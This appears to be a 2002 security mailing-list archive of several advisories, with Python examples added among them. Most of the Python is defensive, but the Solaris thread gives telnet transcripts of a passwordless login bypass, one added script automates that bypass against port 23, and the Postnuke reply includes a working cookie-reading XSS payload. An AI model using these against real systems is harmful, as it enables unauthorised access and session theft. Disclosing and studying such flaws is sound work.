Copyright 2002, Guardian Digital, Inc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9nDtSHD5cqd57fu0RAgo8AJ40oQGnVzzCicxOhxlRBgASyqxMEgCbBCZT
vYmemdCoH+3SUvR0tRUgQf4=
=Cglq
-END PGP SIGNATURE-




GLSA: python

2002-10-03 Thread Daniel Ahlberg

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT
------------------------------------------------------------------------

PACKAGE        :python
SUMMARY        :os.execvpe() vulnerability
DATE           :2002-10-03 14:45 UTC

------------------------------------------------------------------------

OVERVIEW

By exploiting this vulnerability a local attacker can execute
arbitrary code with the privileges of the user running python code
which uses the execvpe() method.

DETAIL

Zack Weinberg found a vulnerability in the way the execvpe() method
from the os.py module uses a temporary file name. A file which
supposedly should not exist is created in an unsafe way and the method
tries to execute it. The objective of such code is to discover what
error the operating system returns in a portable way.

SOLUTION

It is recommended that all Gentoo Linux users who are running
dev-lang/python-2.2.1-r4 and earlier update their systems
as follows:

emerge rsync
emerge python
emerge clean

------------------------------------------------------------------------
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
------------------------------------------------------------------------
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9nFfWfT7nyhUpoZMRAlRIAKChIVtWL75kMwXlt0Ifk5s5seczkgCgiaKZ
t1mU5Nim159c3J9y9dyjELs=
=80ty
-END PGP SIGNATURE-
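The mechanism matters more than the version number: the only reason to exec a file that "should not exist" is to learn which errno the platform returns for a missing file, and picking that name with a predictable temporary filename gives a local user a window to put an executable there first. Since ENOENT and ENOTDIR are already available as constants, the probe is unnecessary. The Python below is an added example, not Gentoo's code and not the os.py implementation: a PATH-search exec in the style of os.execvpe that classifies failures by `errno` constants and never touches a temporary file. `execvpe_noprobe`, `exec_outcome`, `missing_everywhere` and `prefers_real_error` are names invented here; the PATH entries and the non-executable file are constructed for the demonstration.

```python
import errno
import os
import stat
import tempfile


def execvpe_noprobe(file, args, env):
    """Search PATH and exec `file`, like os.execvpe, without a probe file.

    A candidate that is missing (ENOENT) or sits under a non-directory
    (ENOTDIR) only means "keep looking"; the first *other* error (e.g.
    EACCES on a file that exists but is not executable) is the one worth
    reporting, so it is remembered and raised once PATH is exhausted.
    On success this function never returns: the process image is replaced.
    """
    head, _tail = os.path.split(file)
    if head:                                   # explicit path: no search
        os.execve(file, args, env)
    search = env.get("PATH", os.defpath).split(os.pathsep)
    first_real_error = None
    last_error = None
    for directory in search:
        candidate = os.path.join(directory, file)
        try:
            os.execve(candidate, args, env)
        except OSError as exc:
            last_error = exc
            if (exc.errno not in (errno.ENOENT, errno.ENOTDIR)
                    and first_real_error is None):
                first_real_error = exc
    raise first_real_error or last_error


def exec_outcome(file, args, env):
    """Run the search and report the errno name it ends with (demo helper)."""
    try:
        execvpe_noprobe(file, args, env)
    except OSError as exc:
        return errno.errorcode.get(exc.errno, str(exc.errno))
    return "EXECUTED"   # unreachable: a successful exec replaces the process


def missing_everywhere():
    """No directory on the constructed PATH exists: ENOENT, no file created."""
    env = {"PATH": os.pathsep.join(["/nonexistent-dir-a", "/nonexistent-dir-b"])}
    return exec_outcome("no-such-binary-example", ["no-such-binary-example"], env)


def prefers_real_error():
    """A non-executable file earlier on PATH is reported (EACCES) rather than
    being masked by the ENOENT from the later, missing directory."""
    with tempfile.TemporaryDirectory() as tmp:
        blocked = os.path.join(tmp, "tool")
        with open(blocked, "w") as fh:
            fh.write("not a program\n")
        os.chmod(blocked, stat.S_IRUSR | stat.S_IWUSR)   # 0600: no execute bit
        env = {"PATH": os.pathsep.join([tmp, "/nonexistent-dir-c"])}
        return exec_outcome("tool", ["tool"], env)


if __name__ == "__main__":
    print("missing everywhere   ->", missing_everywhere())
    print("non-executable first ->", prefers_real_error())
```

Nothing here writes a name that an attacker could pre-create: the only filesystem activity is the exec attempts themselves, and the errno comparison does the job the probe file used to do.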



SSL certificate validation problems in Ximian Evolution

2002-10-03 Thread Veit Wahlich

Discovered:
2002-09-08, Ximian has been informed on 2002-09-09.

Impact:
medium, if SSL (IMAPS, SMTPS, POP3S) used
none, if not

Affected:
Ximian Evolution 1.0.x and earlier

Description:
Due to missing SSL validation code, Evolution's camel component is
vulnerable to common SSL man-in-the-middle attacks, independent of the
SSL issues currently in discussion. Certificates accepted once are no
longer checked by camel.
The behavior described below has been verified using both self-signed
certificates and a regular, valid Thawte-signed certificate (but
regarded as invalid by camel) for the server, with a self-signed
certificate for the attacker. As the valid certificate was regarded as
invalid, this still needs to be checked with a certificate from a
valid or made-valid CA. 

Solution:
According to Ximian, Evolution 1.1.x (beta of upcoming 1.2 branch) is no
longer affected, so those people who would like to trust in SSL
connections should consider upgrading.
Ximian has released Evolution 1.1.1.

Exploitation Details:
Imagine e.g. an IMAP connection over SSL. After a connection breakdown,
Evolution quietly re-establishes the IMAPS connection on next access,
but it seems not to check the identity of the peer.
During the time period when no connection is established, the
certificate is replaced, e.g. by an SSL m-i-t-m attack, with the
attacker's self-signed certificate, allowing him to read and even
modify all data transferred.
The attacker might also set up SSL m-i-t-m filters first and then
drop/kill the connection still established.
Evolution re-establishes the connection without showing any warning
dialog. Using POP3 and SMTPS over the same certificates (and host) does
not trigger any validation either. 

Regards,
// Veit Wahlich
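Two properties are missing in the behaviour described: the peer is not re-verified when camel silently reconnects, and a certificate accepted once is trusted regardless of what is presented later. The Python below is an added example, not Evolution's code: a reconnect routine that always uses a verifying TLS context (chain and hostname), and a pin store that remembers the SHA-256 fingerprint of the certificate accepted on first contact per host:port and refuses a silent reconnect when it changes. `PinStore`, `decide`, `make_context` and `reconnect_imaps` are names invented here; the DER byte strings in the demonstration are constructed stand-ins, not real certificates, and `reconnect_imaps` is only shown, not run, since it needs a live server.

```python
import hashlib
import socket
import ssl


def fingerprint(der_cert: bytes) -> str:
    """SHA-256 over the DER encoding, the usual pinning identity."""
    return hashlib.sha256(der_cert).hexdigest()


class PinStore:
    """Remembers the certificate first accepted for each (host, port)."""

    def __init__(self):
        self._pins = {}

    def decide(self, host: str, port: int, presented_der: bytes) -> str:
        """'pinned' on first contact, 'ok' on a match, 'changed' on mismatch.

        'changed' must never be auto-accepted: the caller shows a warning and
        the user decides, which is exactly the dialog a silent reconnect skips.
        """
        seen = fingerprint(presented_der)
        stored = self._pins.get((host, port))
        if stored is None:
            self._pins[(host, port)] = seen
            return "pinned"
        return "ok" if stored == seen else "changed"

    def replace(self, host: str, port: int, presented_der: bytes) -> None:
        """Explicit, user-confirmed acceptance of a new certificate."""
        self._pins[(host, port)] = fingerprint(presented_der)


def make_context() -> ssl.SSLContext:
    """A context that validates the chain and the hostname on every connect."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def reconnect_imaps(host: str, pins: PinStore, port: int = 993):
    """(Re)connect to an IMAPS server; returns the TLS socket only if both the
    chain/hostname check and the pin check pass, otherwise raises SSLError."""
    ctx = make_context()
    raw = socket.create_connection((host, port), timeout=10)
    tls = ctx.wrap_socket(raw, server_hostname=host)   # verifies chain + name
    verdict = pins.decide(host, port, tls.getpeercert(binary_form=True))
    if verdict == "changed":
        tls.close()
        raise ssl.SSLError(f"certificate for {host}:{port} changed since first accepted")
    return tls


# Constructed stand-ins for DER certificates (real ones would be ASN.1).
ORIGINAL_CERT = b"constructed-der:mail.example.net:serial-0001"
MITM_CERT = b"constructed-der:self-signed-by-attacker:serial-0001"


def reconnect_scenario():
    """Replay the advisory's sequence against the pin store."""
    pins = PinStore()
    first = pins.decide("mail.example.net", 993, ORIGINAL_CERT)   # first use
    resumed = pins.decide("mail.example.net", 993, ORIGINAL_CERT) # quiet reconnect
    swapped = pins.decide("mail.example.net", 993, MITM_CERT)     # cert replaced
    # Pins are per host:port, so SMTPS on the same host gets its own entry.
    smtps = pins.decide("mail.example.net", 465, ORIGINAL_CERT)
    return first, resumed, swapped, smtps


if __name__ == "__main__":
    print(reconnect_scenario())
```

The pin check is deliberately layered on top of, not instead of, the chain and hostname validation: the context catches a certificate that was never valid, and the pin catches a replacement that is valid for the name but is not the one the user accepted.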






Buffer Overflow in IE/Outlook HTML Help

2002-10-03 Thread NGS Insight Security Research

NGSSoftware Insight Security Research Advisory

Name: Windows Help System Buffer Overflow
Systems: Windows XP,2000,NT,ME and 98
Severity: High Risk
Category: Buffer Overflow Vulnerability
Vendor URL: http://www.microsoft.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/ms-winhlp.txt
Date: 2nd October 2002
Advisory number: #NISR02102002


Introduction

The Windows Help system includes an ActiveX control known as the HTML Help
Control, hhctrl.ocx. The "Alink" function of this control is vulnerable to a
buffer overflow that can be exploited to gain control of the user's machine.

Details
***
By providing an overly long parameter to the vulnerable function an internal
buffer is overflowed and program control structures can be overwritten
allowing an attacker to remotely gain control of their victim's PC. This
could be done by enticing the victim to a website that contained a webpage
that exploits the vulnerability or by sending the victim an HTML mail. When
opened in Outlook the overflow will be triggered.

Fix Information
***
Microsoft have produced a patch which is available from their web site.
More details are available from

http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp











CommonName Toolbar potentially exposes LAN web addresses

2002-10-03 Thread Eric Stevens

Due to a bug in the URL validation done in CommonName Toolbar (in at least
dll version 3.5.2.0 on IE 6), addresses from local intranets may be exposed
to the CommonName organization.  It would appear on early evaluation that
valid URLs such as
http://someserver/some/path
are deemed an attempt to locate an organization named "someserver," with
reference to "some path."

The key seems to be the lack of a dot in the server name.

The danger of this is relatively low: only CommonName is exposed to this
information, and other search engines as configured by the user on the
CommonName website, and even then only after a click-through on the
CommonName website.  All are reputable organizations, though it does still
represent a breach in data security.

Though the danger is low, the annoyance factor is high: users are prevented
from accessing their intranet unless they use a dot-included version of the
server name.

More annoying to me than the bug, and the fact that users here who had it
installed were prevented from actually being able to access our Intranet
servers, however, is that when I turned off all CommonName options, users
were still being directed to the CommonName website on Intranet requests.
Further, in an attempt to allow these users access to our Intranet again, I
closed out of all browsers and uninstalled the CommonName toolbar, restarted
the system, and found that they were still being directed to the CommonName
website on Intranet requests; my best efforts to disable the CommonName
toolbar by supplied mechanisms were futile.

The working solution was to remove all non-administrative access to the
Program Files\CommonName directory, preventing users' IE sessions from being
able to read the DLLs, and finally disabling CommonName's auto-search
functionality.

As an aside, that caused me to stumble on an idea to proactively protect
yourself from spyware: intentionally install it, or else find out what paths
are used to install it, then deny yourself access to those paths, and even
the sneakiest spyware will be unable to install itself on your system,
unless it chooses random locations and file names.

Further testing with the CommonName toolbar is left as an exercise to those
without a database due tomorrow (read: the user).

-MightyE
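The routing decision Eric describes, modelled in Python as an added example
(this is not code from CommonName or from the post): route_as_reported()
reproduces the reported rule, "no dot in the host name means keyword lookup",
and shows exactly what leaves the LAN for http://someserver/some/path;
route_hardened() turns the rule around, so that a dotless name, a private or
loopback address, or a configured intranet suffix is never sent anywhere, and a
keyword lookup happens only for a dotted, well-formed name that local DNS cannot
resolve, and then only the host label is sent. The suffix ".corp.example" and the
`resolves` callback are assumptions standing in for a site's intranet zone
configuration and a real DNS check.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A DNS label: letters, digits and inner hyphens (RFC 1123 host names).
HOST_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")


def split_address(address: str):
    """Break what was typed in the address bar into (host, rest).
    A missing scheme is treated as http so that 'someserver/some/path' and
    'http://someserver/some/path' are judged the same way."""
    parts = urlsplit(address if "://" in address else "http://" + address)
    rest = parts.path or "/"
    if parts.query:
        rest += "?" + parts.query
    return (parts.hostname or ""), rest


def route_as_reported(address: str):
    """Model of the behaviour described in the post: a host name without a
    dot is read as an organisation name to look up and the rest of the URL is
    passed along as a reference.  Returns (destination, data_sent_off_host)."""
    host, rest = split_address(address)
    if "." not in host:
        return "lookup-service", host + rest
    return "browser", None


def is_local_host(host: str, intranet_suffixes=()) -> bool:
    """Names that must never be handed to an outside service: single-label
    names (they only resolve through the local search domain), loopback,
    link-local and RFC 1918 addresses, and any configured intranet suffix."""
    if not host or "." not in host:
        return True
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:
        pass
    return host.lower().endswith(tuple(s.lower() for s in intranet_suffixes))


def route_hardened(address: str, resolves, intranet_suffixes=()):
    """Keyword lookup only as a last resort: for a dotted, syntactically valid
    host name that is not local and that `resolves` (the caller's local DNS
    check, stubbed in the tests) cannot find.  Only the host label is sent,
    never the path or query."""
    host, _ = split_address(address)
    if is_local_host(host, intranet_suffixes):
        return "browser", None          # intranet: the browser resolves it, nothing leaves
    if not all(HOST_LABEL.match(label) for label in host.split(".")):
        return "browser", None          # not a host name at all; let the browser complain
    if resolves(host):
        return "browser", None
    return "lookup-service", host
```

The change of sign is the point: in the reported behaviour a missing dot is
the trigger for sending the address out, while in the hardened routing it is
the strongest reason not to. The price is that single-word keywords are never
auto-searched, which is the trade-off between keyword convenience and not
leaking intranet host names and paths.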




RE: CommonName Toolbar potentially exposes LAN web addresses

2002-10-03 Thread Eric Stevens

In fact, I noticed the "Resolve Local Intranet Names" option; altering its
setting had no noticeable effect on behavior.

Further, I ran the uninstaller with all other applications closed, and
although the options for CommonName were removed from within Internet
Explorer, local addresses were still being routed to the CommonName website.
Rebooting the machine and attempting to delete the CommonName folder in
Program Files before opening any applications, I was denied the ability as
the Babe DLL was already in use, thus the reason I used ACLs to deny access
to that folder.

-Original Message-
From: Support [mailto:[EMAIL PROTECTED]]
Sent: Thursday, October 03, 2002 11:15 AM
To: Eric Stevens; [EMAIL PROTECTED]
Subject: RE: CommonName Toolbar potentially exposes LAN web addresses


Thank you for your email,

Intranet resolution with CommonName can be activated by opening IE, clicking
on

Tools > Internet Options > Advanced

then scrolling down to the CommonName section and selecting Resolve Local
Intranet Names.

With this feature activated Intranet names are not routed to CommonName for
checking against our database of keywords.





Xerox DocuShare Internal IP address disclosure

2002-10-03 Thread Ryan Purita

According to the Xerox Corporate Website:
DocuShare lets team members use your corporate 
intranet or extranet to set up a virtual information-sharing environment. Here, users 
can easily post, retrieve, and search for information that resides in familiar nested 
folders. And they can adapt DocuShare to suit the specific needs of any workgroup or 
project. 
DocuShare gives you instant and controlled 
access to information. Read and write permission rights are granted and maintained by 
the workgroup itself. There's no need for a Webmaster to convert documents to HTML or 
PDF before posting or updating information. And users can see at a glance which 
documents are new and revised. 
By default, anonymous users can create an account or group and upload files at will. 
Aside from uploading a malicious HTML document, and potentially exposing unknowing 
users, the internal IP address of the server running DocuShare can also be revealed. 
Using the Upload Helper Utility, it is possible to gain information about the server 
which is hosting DocuShare. 

DS: 192.168.1.13
URL: http://192.168.1.13:80/dscgi/ds.py/ApplyUpload/Collection-10 

Proxy: 
File: Exploit.html (1955967 bytes)
Start 22:12:46 Sep 30, 02
Finish 4507 msec (result code 200)
Terminate 4517 msec since 1st upload

Depending on the anti-virus program in use, files sent to the server are not checked 
for viruses. When using Trend Micro with the real-time scan enabled and with updated 
virus definitions, it did not identify any of the viruses or malicious HTML code that 
was sent.
Tested in Version 2.2 Workgroup (Build 180)

Ryan Purita
Network Security Analyst
Totally Connected Ltd.
1308 S.E. Marine Drive,
Vancouver, B.C., V5X 4K4
[EMAIL PROTECTED]
Phone:  604-432-7828
Fax:604-432-6773






Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ramon Kagan

Sorry but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
Login incorrect


As you can see I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team -  Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]

-
I have not failed.  I have just
found 10,000 ways that don't work.
- Thomas Edison
-

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: [EMAIL PROTECTED]
>
>




RE: CommonName Toolbar potentially exposes LAN web addresses

2002-10-03 Thread Mustafa Deeb

how can you get rid of Commonname?

Cheers

-Original Message-
From: Eric Stevens [mailto:[EMAIL PROTECTED]]
Sent: Thu, October 03, 2002 3:10 PM
To: Bugtraq; [EMAIL PROTECTED]
Subject: CommonName Toolbar potentially exposes LAN web addresses


Due to a bug in the URL validation done in CommonName Toolbar (in at least
dll version 3.5.2.0 on IE 6), addresses from local intranets may be exposed
to the CommonName organization.  It would appear on early evaluation that
valid URLs such as
http://someserver/some/path
are deemed an attempt to locate an organization named "someserver," with
reference to "some path."

The key seems to be the lack of a dot in the server name.

The danger of this is relatively low: only CommonName is exposed to this
information, and other search engines as configured by the user on the
CommonName website, and even then only after a click-through on the
CommonName website.  All are reputable organizations, though it does still
represent a breach in data security.

Though the danger is low, the annoyance factor is high: users are prevented
from accessing their intranet unless they use a dot-included version of the
server name.

More annoying to me than the bug, and the fact that users here who had it
installed were prevented from actually being able to access our Intranet
servers, however, is that when I turned off all CommonName options, users
were still being directed to the CommonName website on Intranet requests.
Further, in an attempt to allow these users access to our Intranet again, I
closed out of all browsers and uninstalled the CommonName toolbar, restarted
the system, and found that they were still being directed to the CommonName
website on Intranet requests; my best efforts to disable the CommonName
toolbar by supplied mechanisms were futile.

The working solution was to remove all non-administrative access to the
Program Files\CommonName directory, preventing users' IE sessions from being
able to read the DLLs, and finally disabling CommonName's auto-search
functionality.

As an aside, that caused me to stumble on an idea to proactively protect
yourself from spyware: intentionally install it, or else find out what paths
are used to install it, then deny yourself access to those paths, and even
the sneakiest spyware will be unable to install itself on your system,
unless it chooses random locations and file names.

Further testing with the CommonName toolbar is left as an exercise to those
without a database due tomorrow (read: the user).

-MightyE





Re: Solaris 2.6, 7, 8

2002-10-03 Thread Ido Dubrawsky

On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
> 
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
> 
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.


SunOS 5.9

login:


It automatically drops you to the login prompt.  Perhaps this is fixed by a 
patch that got rolled into 9?

Ido
-- 
===
|Ido Dubrawsky   E-mail: [EMAIL PROTECTED]
 |  |   |Network Consulting Engineer
:|::|:  |VSEC Technical Marketing, SAFE Architecture
   :|||:  :|||: |Cisco Systems, Inc.
.:|||:..:|||:.  |Austin, TX. 78759
===






Re: Solaris 2.6, 7, 8

2002-10-03 Thread Dan Diamond

In-Reply-To: <[EMAIL PROTECTED]>

This exploit can also be done locally to gain higher privileges:
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c 
c c c c c c c c c c c c c c c\n
tester:bin#

Patches to resolve are:
2.6 105665-04
2.7 112300-01
2.8 111085-01



Re: Solaris 2.6, 7, 8

2002-10-03 Thread Roy Kidder

Works like a champ on Solaris 2.6/Sparc:


-- begin --

~ $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.


SunOS 5.6

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: Thu Oct  3 14:49:33 from localhost
Sun Microsystems Inc.   SunOS 5.6   Generic August 1997
You have new mail.
bin@ovcle$ uname -a
SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
bin@ovcle$ who am i 
bin        pts/6        Oct  3 15:05    (localhost)

-- end --





On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
> Sorry but I can't reproduce this on a Solaris 7 machine.
> 
> sunlight.ccs% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 
> 
> SunOS 5.7
> 
> login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
> Login incorrect
> 
> 
> As you can see I get a request for a username/password.
> 
> Ramon Kagan
> York University, Computing and Network Services
> Unix Team -  Intermediate System Administrator
> (416)736-2100 #20263
> [EMAIL PROTECTED]
> 
> -
> I have not failed.  I have just
> found 10,000 ways that don't work.
>   - Thomas Edison
> -
> 
> On Wed, 2 Oct 2002, Jonathan S wrote:
> 
> > Hello,
> >
> >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> > environment variable TTYPROMPT.  This vulnerability has already been
> > reported to BugTraq and a patch has been released by Sun.
> >   However, a very simple exploit, which does not require any code to be
> > compiled by an attacker, exists.  The exploit requires the attacker to
> > simply define the environment variable TTYPROMPT to a 6 character string,
> > inside telnet. I believe this overflows an integer inside login, which
> > specifies whether or not the user has been authenticated (just a guess).
> > Once connected to the remote host, you must type the username, followed by
> > 64 " c"s, and a literal "\n".  You will then be logged in as the user
> > without any password authentication.  This should work with any account
> > except root (unless remote root login is allowed).
> >
> > Example:
> >
> > coma% telnet
> > telnet> environ define TTYPROMPT abcdef
> > telnet> o localhost
> >
> > SunOS 5.8
> >
> > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> > Last login: whenever
> > $ whoami
> > bin
> >
> > Jonathan Stuart
> > Network Security Engineer
> > Computer Consulting Partners, Ltd.
> > E-mail: [EMAIL PROTECTED]
> >
> >
> 
-- 
===
Roy Kidder
Data Network Engineer
CoreComm
---
"...these products' frequent failures are 
legitimized by ubiquitous acquiescence." 
 -- Doc Searls on Microsoft products.
===
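The exchange this thread describes, as an added Python example that is not
code from any of the posters: it encodes the NEW-ENVIRON subnegotiation that
"telnet> environ define TTYPROMPT abcdef" produces (RFC 1572; sending TTYPROMPT
as USERVAR is an assumption about the Solaris client), answers the server's
option negotiation, builds the login line Jonathan describes (user name, 64
times " c", a literal "\n"), and classifies the server's reply against the
three outcomes reported above: Ramon's "Password:", Roy's "Last login", and
Ido's bare "login:" prompt. check_host() drives it against port 23 of a host
you are authorised to test; waiting for the "SunOS" banner as the cue to send
the line is an assumption, and the user name "bin" follows the posts.

```python
import socket

# Telnet (RFC 854) and NEW-ENVIRON option (RFC 1572) constants.
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPT_NEW_ENVIRON = 39
ENV_IS, ENV_SEND = 0, 1
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3


def env_escape(data: bytes) -> bytes:
    """Escape a NEW-ENVIRON name or value: VAR, VALUE, ESC and USERVAR get
    an ESC prefix, and IAC is doubled as in every subnegotiation."""
    out = bytearray()
    for b in data:
        if b in (ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR):
            out.append(ENV_ESC)
        elif b == IAC:
            out.append(IAC)
        out.append(b)
    return bytes(out)


def new_environ_is(name: bytes, value: bytes) -> bytes:
    """What 'telnet> environ define NAME VALUE' puts on the wire once the
    server asks for the environment: IAC SB NEW-ENVIRON IS USERVAR name VALUE
    value IAC SE.  TTYPROMPT is not a well-known variable, hence USERVAR
    (assumed; the Solaris client itself is not inspected here)."""
    return (bytes([IAC, SB, OPT_NEW_ENVIRON, ENV_IS, ENV_USERVAR]) + env_escape(name)
            + bytes([ENV_VALUE]) + env_escape(value) + bytes([IAC, SE]))


def login_line(user: str, count: int = 64) -> bytes:
    """The line typed where the login prompt would have been: user name,
    `count` copies of ' c', a literal backslash-n as in the posts, newline."""
    return (user + " c" * count + "\\n\n").encode("ascii")


def negotiate(data: bytes, env_subneg: bytes):
    """Answer the option negotiation found in one chunk of server output:
    accept NEW-ENVIRON and answer its SEND with env_subneg, refuse every other
    option, and return (reply_bytes, plain_text)."""
    reply, text, i = bytearray(), bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            text.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            break
        cmd = data[i + 1]
        if cmd == IAC:                          # escaped 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= len(data):
                break
            opt = data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WILL if opt == OPT_NEW_ENVIRON else WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break
            if data[i + 2:i + 4] == bytes([OPT_NEW_ENVIRON, ENV_SEND]):
                reply += env_subneg
            i = end + 2
        else:                                   # NOP, GA and other 2-byte commands
            i += 2
    return bytes(reply), bytes(text)


def classify(output: bytes) -> str:
    """Map what the server printed after the login line onto the outcomes
    reported in this thread."""
    if b"Password:" in output or b"Login incorrect" in output:
        return "not vulnerable"   # a password is still demanded (Ramon's Solaris 7)
    if b"Last login" in output:
        return "vulnerable"       # session opened for the user, no password asked
    return "undetermined"         # e.g. just a fresh 'login:' prompt (Ido's Solaris 9)


def check_host(host: str, port: int = 23, user: str = "bin", timeout: float = 5.0) -> str:
    """Drive the exchange against a host you are authorised to test.  Waiting
    for the 'SunOS' banner before typing the line is an assumption."""
    env = new_environ_is(b"TTYPROMPT", b"abcdef")
    seen = bytearray()
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            while b"SunOS" not in seen:
                chunk = s.recv(4096)
                if not chunk:
                    return "undetermined"
                reply, text = negotiate(chunk, env)
                if reply:
                    s.sendall(reply)
                seen += text
            s.sendall(login_line(user))
            seen.clear()
            while chunk := s.recv(4096):
                seen += negotiate(chunk, env)[1]
        except socket.timeout:
            pass
    return classify(bytes(seen))
```

The classifier keys on the strings the transcripts in this thread show, so a
host with a customised banner or login prompt needs its own patterns, and an
"undetermined" result is a reason to look at the session by hand rather than a
clean bill of health. The remote variant depends on telnetd carrying the
variable into login's environment, so this check says nothing about the local
variant Dan describes.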




Re: Postnuke XSS fixed

2002-10-03 Thread Sebastian Konstanty Zdrojewski

I saw the problem has been solved, and the GET you proposed below is no
longer working. But if you use the following GET, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Best Regards,

Sebastian

Daniel Woods wrote:

> Humm!
>
> Not so fast on the praise :(
>
> It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=